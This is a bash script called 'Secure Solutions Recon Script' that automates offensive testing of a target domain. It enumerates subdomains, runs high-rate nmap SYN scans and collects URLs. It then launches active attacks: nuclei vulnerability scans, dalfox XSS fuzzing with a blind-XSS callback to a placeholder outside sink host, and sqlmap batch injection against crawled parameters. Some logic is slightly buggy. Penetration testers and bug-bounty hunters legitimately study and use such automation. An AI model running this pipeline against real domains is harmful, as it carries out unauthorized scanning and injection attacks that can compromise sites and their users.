#!/bin/bash
#You need to build or add an XSS sink for getdalfox() - xss.ht is now defunct.
echo -e "\e[33mSecure Solutions \e[32mRecon\e[31m Script\n"
#### ADD NEW UNFURL OPTIONS!!!
if [ ! -d /root/auto/nuclei ]; then
    mkdir -p /root/auto/nuclei
fi
if [ ! -d /root/auto/subhttp ]; then
    mkdir -p /root/auto/subhttp
fi
if [ ! -d /root/auto/amass ]; then
    mkdir -p /root/auto/amass
fi
if [ ! -d /root/auto/full ]; then
    mkdir -p /root/auto/full
fi
if [ ! -d /root/auto/httprobe ]; then
    mkdir -p /root/auto/httprobe
fi
if [ ! -d /root/auto/asset ]; then
    mkdir -p /root/auto/asset
fi
if [ ! -d /root/auto/mass ]; then
    mkdir -p /root/auto/asset
fi
if [ ! -d /root/auto/nmap ]; then
    mkdir -p /root/auto/nmap
fi
if [ ! -d /root/auto/dalfox ]; then
    mkdir -p /root/auto/dalfox
fi
if [ ! -d /root/auto/massdns ]; then
    mkdir -p /root/auto/massdns
    wget https://raw.githubusercontent.com/janmasarik/resolvers/master/resolvers.txt -O /root/auto/massdns/shortworking.txt
fi
if [ ! -d /root/auto/gospider ]; then
    mkdir -p /root/auto/gospider
fi
if [ ! -d /root/auto/sqlmap ]; then
    mkdir -p /root/auto/sqlmap
    touch /root/auto/sqlmap/sqli.txt
fi

TLDcount=$(echo $1|awk -F'.' '{print NF}')
if [ $TLDcount -gt 2 ]; then
    TLD=$(echo $1 |rev | cut -d '.' -f 1 | rev|tr '[:upper:]' '[:lower:]')
    BLD=$(echo $1 |rev | cut -d '.' -f 2-$TLDcount | rev|tr '[:upper:]' '[:lower:]')
else
    BLD=$(echo $1 |cut -d '.' -f 1|tr '[:upper:]' '[:lower:]')
    TLD=$(echo $1 |cut -d '.' -f 2|tr '[:upper:]' '[:lower:]')
fi
echo -e "\e[92mRecon running, please. Whait..\n"
getsubfinder(){
echo "" > /root/auto/subhttp/saida.txt
subfinder -t 100 -d $1 -silent >> /root/auto/subhttp/saida.txt
}
getmassdns(){
echo "" > /root/auto/mass/results.txt
cat /root/auto/mass/all.txt | while read subs;do echo $subs.$1 >> /root/auto/mass/results.txt;done
cat /root/auto/mass/results.txt| massdns -r /root/auto/massdns/shortworking.txt -t A -o L -w /root/auto/mass/$1-results.txt
}
getassetfinder(){
echo "" > /root/auto/asset/finder.txt
assetfinder --subs-only $1 >> /root/auto/asset/finder.txt
}
getcollect(){
echo -n > /root/auto/mass/temp.txt
cat /root/auto/subhttp/saida.txt /root/auto/asset/finder.txt | massdns -r /root/auto/massdns/shortworking.txt -t A -o L -w /root/auto/mass/$1-results1.txt
cat /root/auto/mass/$1-results1.txt /root/auto/mass/$1-results.txt |tr '[:upper:]' '[:lower:]' |sort -u |grep -v '*' >> /root/auto/mass/temp.txt
cat /root/auto/mass/temp.txt|tr '[:upper:]' '[:lower:]' |sort -u > /root/auto/full/$1-fullenumerate.txt
}
getnmap(){
if [ -f /root/auto/httprobe/temp.txt ]; then
   echo -n > /root/auto/httprobe/temp.txt
fi
count=$(cat /root/auto/mass/temp.txt|wc -l)
if [ $count -lt 10000 ]; then
   cat /root/auto/mass/temp.txt| httprobe > /root/auto/httprobe/temp.txt
   cat /root/auto/httprobe/temp.txt |cut -d '/' -f 3| sort -u > /root/auto/httprobe/$1-dnswopenports.txt
elif [ $count -gt 6001 ] && [ $count -le 300000 ]; then
   nmap -sS -Pn -p 80,443 --max-retries 1 --dns-servers 1.1.1.1 --max-rtt-timeout 100ms -iL /root/auto/full/$1-fullenumerate.txt --min-rate 65535 --open -oA /root/auto/nmap/$1-Remote-Ports
else
   cp /root/auto/full/$1-fullenumerate.txt /root/auto/httprobe/$1-dnswopenports.txt
fi
}
getwayback(){
if [ -f /root/auto/nmap/$1-Remote-Ports.nmap ]; then
    grep 'Nmap scan report for' /root/auto/nmap/$1-Remote-Ports.nmap |cut -d ' ' -f 5 >> /root/auto/httprobe/$1-dnswopenports.txt
fi
if [ ! -f /root/auto/httprobe/$1-gau.txt ]; then
    cat /root/auto/httprobe/$1-dnswopenports.txt | gau --subs --providers gau,commoncrawl,otx,urlscan --threads 100 >> /root/auto/httprobe/$1-gau.txt
fi
if [ ! -f /root/auto/gospider/$1 ]; then
    cat /root/auto/httprobe/$1-gau.txt|gospider -t 150 --js --subs --sitemap --robots -r /root/auto/httprobe/$1-gau.txt -d 4 -o /root/auto/gospider/$1
fi
cat /root/auto/gospider/$1/*_$TLD |cut -d ' ' -f 3|grep -i "$1/"|grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js$|js$\?)" | sort -u | qsreplace -a > /root/auto/dalfox/$1-gaubefore.txt
cat /root/auto/httprobe/$1-gau.txt| grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js$|js$\?)" | grep $1|sort -u | qsreplace -a >> /root/auto/dalfox/$1-gaubefore.txt
cat /root/auto/dalfox/$1-gaubefore.txt| sort -u > /root/auto/dalfox/$1-gaufinal.txt
cat /root/auto/dalfox/$1-gaufinal.txt| cut -d '/' -f 1,2,3 |grep -i "$1"|sort -u > /root/auto/nuclei/$1-hostsfornuclei.txt
}
getnuclei(){
&> /dev/null nuclei -l /root/auto/nuclei/$1-hostsfornuclei.txt -c 100 -o /root/auto/nuclei/$1-nuclei.txt -s medium, high, critical, unknown
}
getdalfox(){
cat /root/auto/dalfox/$1-gaufinal.txt | dalfox pipe -b https://NEED-TO-CREATE-XSS-SINK.xss.ht -w 130 -o /root/auto/dalfox/$1-dalfoxout.txt --skip-bav
}

getsqlmap(){
cat /root/auto/dalfox/*-gaufinal.txt|gf sqli |grep -i "$1/" > /root/auto/sqlmap/sqli.txt
/usr/local/bin/sqlmap.py -o --threads 4 --batch --crawl=1 --random-agent -m /root/auto/sqlmap/sqli.txt --output-dir=/root/auto/sqlmap/
}

if [ ! -f /root/auto/mass/$1-results.txt ]; then
   getmassdns $1
fi
if [ ! -f /root/auto/full/$1-fullenumerate.txt ]; then
    getsubfinder $1
    getassetfinder $1
    getcollect $1
fi
if [ ! -f /root/auto/nmap/$1-Remote-Ports.nmap ]; then
    getnmap $1
fi
if [ ! -f /root/auto/dalfox/$1-gaufinal.txt ]; then
    getwayback $1
fi
getnuclei $1
getdalfox $1
getsqlmap $1